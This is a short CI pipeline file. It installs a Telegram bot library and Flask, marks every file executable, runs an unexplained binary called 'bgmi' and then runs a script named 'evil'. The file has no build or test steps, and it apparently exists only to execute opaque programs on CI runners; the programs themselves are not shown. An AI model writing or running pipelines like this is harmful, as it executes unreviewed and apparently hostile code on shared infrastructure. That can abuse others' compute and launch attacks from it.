version: '1.0'

pipeline:
  stages:
    - Execute

jobs:
  execute:
    stage: Execute
    image: python:3.9
    script:
      - echo "Installing Python dependencies"
      - pip install --upgrade pip
      - pip install python-telegram-bot flask
      - echo "Granting execute permissions to the binary"
      - chmod +x *
      - echo "Executing the binary"
      - ./bgmi
      - echo "Running the Python script"
      - python evil